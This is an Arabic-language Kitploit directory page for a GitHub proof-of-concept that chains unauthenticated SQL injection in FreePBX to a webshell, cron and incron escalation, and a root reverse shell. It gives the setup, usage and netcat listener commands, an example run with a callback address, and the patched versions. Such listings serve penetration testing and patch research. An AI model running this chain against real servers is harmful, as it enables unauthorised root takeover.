Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-57819-FreePBX-RCE2Root — إثبات مفهوم (PoC) لسلسلة استغلال كاملة لثغرة CVE-2025-57819 في FreePBX 15 و16 و17: من SQLi بدون مصادقة إلى RCE والسيطرة الكاملة على الجذر (root). | Kitploit
أدوات/GitHubGitHub/ozcanpng/cve-2025-57819-freepbx-rce2root
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubozcanpng/cve-2025-57819-freepbx-rce2root

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-57819-FreePBX-RCE2Root

إثبات مفهوم (PoC) لسلسلة استغلال كاملة لثغرة CVE-2025-57819 في FreePBX 15 و16 و17: من SQLi بدون مصادقة إلى RCE والسيطرة الكاملة على الجذر (root).

عرض المستودع
1منذ 2 أشهرلم تتم المراجعة بعد

CVE-2025-57819 — FreePBX SQLi → RCE → Root

إثبات مفهوم كامل السلسلة لـ CVE-2025-57819. حقن SQL قائم على الأخطاء دون مصادقة في وحدة endpoint في FreePBX يتسلسل إلى شل بصلاحيات الجذر عبر حقن مهام cron وتصعيد الامتيازات عبر incron.

للاستخدام في الاختبارات والأبحاث المصرح بها فقط. لا تستخدمه ضد أنظمة لا تملكها.


ماذا يفعل

root@kitploit:~
SQLi (EXTRACTVALUE) → INSERT cron job → webshell drop → incron trigger → root shell
  1. يستخرج معلومات قاعدة البيانات عبر الحقن القائم على الأخطاء في /admin/ajax.php
  2. يحقن مهمة cron تكتب قشرة ويب PHP إلى جذر الويب
  3. ينتظر تنفيذ cron (حوالي 60 ثانية)، ويؤكد تنفيذ الأوامر عن بُعد (RCE) كمستخدم asterisk
  4. ينشئ ملف مشغّل incron يشغّل خطاف fwconsole بصلاحيات الجذر
  5. يلتقط الصدفة العكسية على المستمع الخاص بك

الإعداد

root@kitploit:~
git clone https://github.com/ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
cd CVE-2025-57819-FreePBX-RCE2Root
pip install -r requirements.txt

الاستخدام

root@kitploit:~
python3 CVE-2025-57819.py <target> <lhost> <lport> [--cleanup]

ابدأ مستمعًا أولاً:

root@kitploit:~
nc -lvnp 9999

ثم شغّل:

root@kitploit:~
python3 CVE-2025-57819.py freepbx.example.com 192.168.1.50 9999

يؤدي --cleanup إلى إزالة قشرة الويب ومهمة cron بعد الاستغلال.


الإصدارات المتأثرة

FreePBX مع تثبيت وحدة endpoint. يتم تمرير معامل brand في /admin/ajax.php دون تعقيم إلى استعلام SQL.

FreePBXالنسخة المصححة
15.x15.0.66
16.x16.0.89
17.x17.0.3

المراجع

  • FreePBX Security Advisory GHSA-m42g-xg4c-5f3h
  • NVD — CVE-2025-57819

المؤلف

ozcanpng — github.com/ozcanpng — ozcanpng.dev

تنزيل الأداة